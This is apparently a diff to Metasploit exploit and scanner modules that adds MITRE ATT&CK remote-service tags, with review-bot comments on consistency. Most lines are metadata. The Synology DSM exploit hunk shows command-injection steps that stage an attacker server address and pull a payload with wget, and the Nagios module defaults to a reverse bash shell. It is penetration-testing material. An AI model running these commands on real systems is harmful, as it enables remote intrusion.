diff --git a/modules/auxiliary/admin/smb/change_password.rb b/modules/auxiliary/admin/smb/change_password.rb
index 3f056936151a1..f4df27d0c1853 100644
--- a/modules/auxiliary/admin/smb/change_password.rb
+++ b/modules/auxiliary/admin/smb/change_password.rb
@@ -26,6 +26,7 @@ def initialize(info = {})
 ],
 'References' => [
 ['URL', 'https://github.com/fortra/impacket/blob/master/examples/changepasswd.py'],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
 ],
 'Notes' => {
 'Stability' => [CRASH_SAFE],
diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index 9a73089b15244..8c9f556b8da00 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -31,6 +31,7 @@ def initialize
 'j0hn__f'
 ],
 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
 ],
 'License' => MSF_LICENSE,
 'Notes' => {
diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb
index 1b65c2b2b6843..747ffc749c3dc 100644
--- a/modules/auxiliary/admin/smb/delete_file.rb
+++ b/modules/auxiliary/admin/smb/delete_file.rb
@@ -30,6 +30,9 @@ def initialize
 'mubix' # copied from hdm upload_file module
 ],
 'License' => MSF_LICENSE,
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
+ ],
 'Notes' => {
 'Stability' => [OS_RESOURCE_LOSS],
 'SideEffects' => [],
diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb
index d7e7743d2293b..cdcfd87e81979 100644
--- a/modules/auxiliary/admin/smb/download_file.rb
+++ b/modules/auxiliary/admin/smb/download_file.rb
@@ -29,7 +29,10 @@ def initialize
 'Stability' => [CRASH_SAFE],
 'SideEffects' => [],
 'Reliability' => []
- }
+ },
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
+ ]
 )
 register_options([ 
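Review bot: The entry added to change_password.rb is written `[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]` with padded brackets directly under an `['URL', ...]` entry that has none, so the array now mixes both spacings; drop the padding to match its neighbour, `['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]`. download_file.rb is the only file in this diff that places the new `'References'` key after `'Notes'`; key order does not change the resulting hash, so this is a readability point, but moving it ahead of `'Notes'` would match the other touched modules. The `T1021_*` constants are evaluated when each module is loaded and their definitions are not part of this diff, so every touched module would fail to load with a NameError if any of the five names used here is missing from `Mitre::Attack::Technique`; the `T1003_003_NTDS` entry retained in psexec_ntdsgrab.rb shows the namespace exists, but the new names themselves should be confirmed before merge.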
diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb
index 374f0865c36fe..c883f9355a3bf 100644
--- a/modules/auxiliary/admin/smb/list_directory.rb
+++ b/modules/auxiliary/admin/smb/list_directory.rb
@@ -27,6 +27,7 @@ def initialize
 'hdm'
 ],
 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
 ],
 'License' => MSF_LICENSE,
 'Notes' => {
diff --git a/modules/auxiliary/admin/smb/ms17_010_command.rb b/modules/auxiliary/admin/smb/ms17_010_command.rb
index 38d598e61a095..a0b2a38a6bae8 100644
--- a/modules/auxiliary/admin/smb/ms17_010_command.rb
+++ b/modules/auxiliary/admin/smb/ms17_010_command.rb
@@ -41,6 +41,7 @@ def initialize(info = {})
 [ 'URL', 'https://github.com/worawit/MS17-010' ],
 [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
 [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
 ],
 'DisclosureDate' => '2017-03-14',
 'Notes' => {
diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
index f9ff4e0698ed3..5eaf3be37d00c 100644
--- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
+++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb
@@ -35,7 +35,8 @@ def initialize(info = {})
 'References' => [
 [ 'URL', 'http://sourceforge.net/projects/smbexec' ],
 [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
- [ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ]
+ [ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
 ],
 'Notes' => {
 'Stability' => [CRASH_SAFE],
diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
index 27ca1898fca0c..0d23da474befd 100644
--- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb 
+++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
@@ -29,7 +29,8 @@ def initialize
 'References' => [
 ['CVE', '2010-0926'],
 ['OSVDB', '62145'],
- ['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
+ ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
 ],
 'License' => MSF_LICENSE,
 'Notes' => {
diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb
index 856c6d9345611..908c91949df29 100644
--- a/modules/auxiliary/admin/smb/upload_file.rb
+++ b/modules/auxiliary/admin/smb/upload_file.rb
@@ -26,6 +26,7 @@ def initialize
 'hdm' # metasploit module
 ],
 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
 ],
 'License' => MSF_LICENSE,
 'Notes' => {
diff --git a/modules/auxiliary/admin/smb/webexec_command.rb b/modules/auxiliary/admin/smb/webexec_command.rb
index ce6f46611b172..5e28c25e8215d 100644
--- a/modules/auxiliary/admin/smb/webexec_command.rb
+++ b/modules/auxiliary/admin/smb/webexec_command.rb
@@ -30,7 +30,8 @@ def initialize(info = {})
 'License' => MSF_LICENSE,
 'References' => [
 ['URL', 'https://webexec.org'],
- ['CVE', '2018-15442']
+ ['CVE', '2018-15442'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
 ],
 'Notes' => {
 'Stability' => [CRASH_SAFE],
diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
index a8a290d996507..214a32700b7b5 100644
--- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
+++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb
@@ -29,6 +29,7 @@ def initialize(info = {})
 ['OSVDB', '25479'],
 ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'],
 ['CVE', '2006-2369'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC],
 ],
 'DisclosureDate' => '2006-05-15',
 'Notes' => { 
diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb
index 3dd4715141197..dee6e214ef764 100644
--- a/modules/auxiliary/scanner/smb/smb_login.rb
+++ b/modules/auxiliary/scanner/smb/smb_login.rb
@@ -43,6 +43,7 @@ def initialize
 ],
 'References' => [
 [ 'CVE', '1999-0506'], # Weak password
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
 ],
 'License' => MSF_LICENSE,
 'DefaultOptions' => {
diff --git a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
index 6c59f460a1409..778263eafdbea 100644
--- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
@@ -33,7 +33,8 @@ def initialize(info = {})
 ['CVE', '2018-16158'],
 ['EDB', '45283'],
 ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
- ['URL', 'https://www.ctrlu.net/vuln/0006.html']
+ ['URL', 'https://www.ctrlu.net/vuln/0006.html'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DisclosureDate' => '2018-07-18',
 'License' => MSF_LICENSE,
diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
index 8ef9ec6e03a67..bc8232e9c2e0d 100644
--- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
@@ -29,7 +29,8 @@ def initialize(info = {})
 ['EDB', '39224'],
 ['PACKETSTORM', '135225'],
 ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'],
- ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios']
+ ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DisclosureDate' => '2016-01-09',
 'License' => MSF_LICENSE, 
diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
index f2d06e9e0585e..90c1e3c605518 100644
--- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
+++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb
@@ -26,7 +26,8 @@ def initialize(info = {})
 'References' => [
 ['CVE', '2015-7755'],
 ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],
- ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
+ ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DisclosureDate' => '2015-12-20',
 'License' => MSF_LICENSE,
diff --git a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
index c90f6c0f24200..5e39df507981d 100644
--- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
+++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb
@@ -36,7 +36,8 @@ def initialize(info = {})
 ],
 'References' => [
 ['CVE', '2018-10933'],
- ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt']
+ ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DisclosureDate' => '2018-10-16',
 'License' => MSF_LICENSE,
diff --git a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb
index a66ca27b0dfc4..2acecea4b8b38 100644
--- a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb 
@@ -22,7 +22,10 @@ def initialize(info = {})
 'Author' => ['Wyatt Dahlenburg (@wdahlenb)'],
 'Platform' => ['linux'],
 'SessionTypes' => ['shell', 'meterpreter'],
- 'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']],
+ 'References' => [
+ ['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
+ ],
 'Notes' => {
 'Reliability' => UNKNOWN_RELIABILITY,
 'Stability' => UNKNOWN_STABILITY,
diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb
index a1c411d256d36..1eac991d824e0 100644
--- a/modules/auxiliary/scanner/ssh/ssh_login.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login.rb
@@ -28,7 +28,8 @@ def initialize
 },
 'Author' => ['todb'],
 'References' => [
- [ 'CVE', '1999-0502'] # Weak password
+ [ 'CVE', '1999-0502'], # Weak password
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
 ],
 'License' => MSF_LICENSE,
 'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors
diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
index 6953aa11f4021..907b1864462f7 100644
--- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb
@@ -35,7 +35,10 @@ def initialize
 be shared between subject keys or only belong to a single one.
 },
 'Author' => ['todb', 'RageLtMan'],
- 'License' => MSF_LICENSE
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
+ ]
 )
 register_options(
diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb
index a0a4c9bdf10fa..f758c71f18faa 100644
--- a/modules/auxiliary/scanner/telnet/telnet_login.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_login.rb 
@@ -26,7 +26,8 @@ def initialize
 },
 'Author' => 'egypt',
 'References' => [
- [ 'CVE', '1999-0502'] # Weak password
+ [ 'CVE', '1999-0502'], # Weak password
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'License' => MSF_LICENSE
 )
diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
index 38ac70627802a..eecb689ea5de5 100644
--- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
+++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb
@@ -21,7 +21,8 @@ def initialize(info = {})
 'References' => [
 [ 'CVE', '2012-1803' ],
 [ 'EDB', '18779' ],
- [ 'US-CERT-VU', '889195' ]
+ [ 'US-CERT-VU', '889195' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Author' => [
 'Borja Merino ',
diff --git a/modules/auxiliary/scanner/vnc/ard_root_pw.rb b/modules/auxiliary/scanner/vnc/ard_root_pw.rb
index 78d3adf7ba245..d0ef3b604b9b5 100644
--- a/modules/auxiliary/scanner/vnc/ard_root_pw.rb
+++ b/modules/auxiliary/scanner/vnc/ard_root_pw.rb
@@ -14,7 +14,8 @@ def initialize
 'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.',
 'References' => [
 ['CVE', '2017-13872'],
- ['URL', 'https://support.apple.com/en-us/HT208315']
+ ['URL', 'https://support.apple.com/en-us/HT208315'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC]
 ],
 'Author' => 'jgor',
 'License' => MSF_LICENSE
diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb
index f69fa4fac0c6f..8fdc830500b98 100644
--- a/modules/auxiliary/scanner/vnc/vnc_login.rb
+++ b/modules/auxiliary/scanner/vnc/vnc_login.rb
@@ -26,7 +26,8 @@ def initialize
 'jduck'
 ],
 'References' => [
- [ 'CVE', '1999-0506'] # Weak password
+ [ 'CVE', '1999-0506'], # Weak password
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'License' => MSF_LICENSE
 ) 
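Review bot: vnc_login.rb tags the parent technique `Mitre::Attack::Technique::T1021_REMOTE_SERVICES`, while the other two VNC modules in this diff, ard_root_pw.rb on this same line and realvnc_41_bypass.rb earlier, tag the sub-technique `T1021_005_VNC`; this module authenticates to VNC directly, so `[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]` would keep the mapping consistent across the VNC modules. The telnet modules (telnet_login.rb, telnet_ruggedcom.rb) keeping the parent technique looks right, since as far as I know ATT&CK defines no Telnet sub-technique under T1021.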
diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
index f5997805fe0f3..6f2bb30591be2 100644
--- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb
@@ -17,7 +17,10 @@ def initialize
 This module runs arbitrary Windows commands using the WinRM Service
 },
 'Author' => [ 'thelightcosine' ],
- 'License' => MSF_LICENSE
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
+ ]
 )
 register_options(
diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb
index a39146c1f7764..a6c85810e2156 100644
--- a/modules/auxiliary/scanner/winrm/winrm_login.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb
@@ -30,7 +30,8 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set.
 },
 'Author' => [ 'thelightcosine', 'smashery' ],
 'References' => [
- [ 'CVE', '1999-0502'] # Weak password
+ [ 'CVE', '1999-0502'], # Weak password
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
 ],
 'License' => MSF_LICENSE
 )
diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb
index 2db73ca878c63..c020d1f3fd6cf 100644
--- a/modules/auxiliary/scanner/winrm/winrm_wql.rb
+++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb
@@ -19,7 +19,10 @@ def initialize
 winrm option must be set.
 },
 'Author' => [ 'thelightcosine' ],
- 'License' => MSF_LICENSE
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
+ ]
 )
 register_options(
diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
index 3b80bacf63822..fc17ef5b25847 100644
--- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb
+++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb 
@@ -26,7 +26,8 @@ def initialize(info = {})
 'hdm'
 ],
 'References' => [
- ['OSVDB', '61284']
+ ['OSVDB', '61284'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'DefaultOptions' => {
 'EXITFUNC' => 'thread'
diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
index db93ccdad7e51..9ce07224563df 100644
--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -42,7 +42,8 @@ def initialize(info = {})
 'References' => [
 ['CVE', '2023-45249'],
 ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'],
- ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249']
+ ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'License' => MSF_LICENSE,
 'Platform' => ['unix', 'linux'],
diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb
index 34f56c81f4a3c..1342cb373b4bb 100644
--- a/modules/exploits/linux/http/asuswrt_lan_rce.rb
+++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb
@@ -33,7 +33,8 @@ def initialize(info = {})
 ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'],
 ['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'],
 ['CVE', '2018-5999'],
- ['CVE', '2018-6000']
+ ['CVE', '2018-6000'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Targets' => [
 [
diff --git a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
index 85d67626f59da..82c300184df4b 100644
--- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb
+++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb 
@@ -29,7 +29,8 @@ def initialize(info = {})
 ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code.
 ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory
 ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory
- ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis
+ ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2024-12-16',
 'Platform' => [ 'linux', 'unix' ],
diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb
index f132df4b1a06c..6dca771cce14b 100644
--- a/modules/exploits/linux/http/f5_icontrol_exec.rb
+++ b/modules/exploits/linux/http/f5_icontrol_exec.rb
@@ -24,7 +24,8 @@ def initialize(info = {})
 ],
 'References' => [
 ['CVE', '2014-2928'],
- ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
+ ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Platform' => ['unix'],
 'Arch' => ARCH_CMD,
diff --git a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
index cbb771403d54e..a0921d06cf375 100644
--- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb 
@@ -53,7 +53,8 @@ module does not presently support exploiting these targets.
 ],
 'References' => [
 ['CVE', '2019-15949'],
- ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit
+ ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Payload' => { 'BadChars' => "\x00" },
 'Targets' => [
@@ -77,7 +78,9 @@ module does not presently support exploiting these targets.
 'Platform' => 'unix',
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
 'Payload' => {
+ # rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace
 'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails
+ # rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace
 'BadChars' => '"'
 }
 }
diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
index 27c429b14e769..398540005b218 100644
--- a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
+++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb
@@ -29,7 +29,8 @@ def initialize(info = {})
 ['URL', 'https://github.com/Supervisor/supervisor/issues/964'],
 ['URL', 'https://www.debian.org/security/2017/dsa-3942'],
 ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'],
- ['CVE', '2017-11610']
+ ['CVE', '2017-11610'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'Platform' => 'linux',
 'Targets' => [
diff --git a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
index 49c582ac029c1..49c434e805872 100644
--- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb
+++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb 
@@ -39,7 +39,8 @@ def initialize(info = {})
 [ 'CVE', '2017-15889' ],
 [ 'EDB', '43190' ],
 [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ],
- [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ]
+ [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Privileged' => true,
 'Stance' => Msf::Exploit::Stance::Aggressive,
@@ -179,20 +180,20 @@ def exploit
 })
 print_status('Cleaning env')
- inject_request(cookie, token, cmd = 'rm -rf /a')
- inject_request(cookie, token, cmd = 'rm -rf b')
+ inject_request(cookie, token, 'rm -rf /a')
+ inject_request(cookie, token, 'rm -rf b')
 command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//)
 command_space = 22 - "echo -n ''>>/a".length
 command_space -= 1
 command.each_slice(command_space) do |a|
 a = a.join('')
 vprint_status("Staging wget with: echo -n '#{a}'>>/a")
- inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a")
+ inject_request(cookie, token, "echo -n '#{a}'>>/a")
 end
 print_status('Requesting payload pull')
 register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b')
 register_file_for_cleanup('/a')
- inject_request(cookie, token, cmd = 'wget -i /a -O b')
+ inject_request(cookie, token, 'wget -i /a -O b')
 # at this point we let the HTTP server call the last stage
 # wfsdelay should be long enough to hold out for everything to download and run
 rescue ::Rex::ConnectionError
diff --git a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb
index c7e476342f83d..c6067e58ee23c 100644
--- a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb
+++ b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb 
@@ -36,7 +36,8 @@ def initialize(info = {})
 },
 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
 'References' => [
- [ 'CVE', '2013-2578']
+ [ 'CVE', '2013-2578'],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Targets' => [
 [ 'Automatic', {} ],
diff --git a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb
index 5c813e6be1e91..61854e380a030 100644
--- a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb
+++ b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb
@@ -31,7 +31,8 @@ def initialize(info = {})
 'References' => [
 ['CVE', '2025-24016'],
 ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'],
- ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016']
+ ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'License' => MSF_LICENSE,
 'Platform' => ['unix', 'linux'],
diff --git a/modules/exploits/linux/misc/igel_command_injection.rb b/modules/exploits/linux/misc/igel_command_injection.rb
index 2857a90861e48..72e42d2fbc67b 100644
--- a/modules/exploits/linux/misc/igel_command_injection.rb
+++ b/modules/exploits/linux/misc/igel_command_injection.rb
@@ -35,7 +35,9 @@ def initialize(info = {})
 'References' => [
 [ 'CVE', '2025-34082' ],
 [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ],
- [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ]
+ [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], # Telnet service
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
 ],
 'Platform' => ['linux'],
 'Arch' => [ARCH_X86, ARCH_X64], 
diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
index d909e5ec2cfa5..78e45b09fd918 100644
--- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb
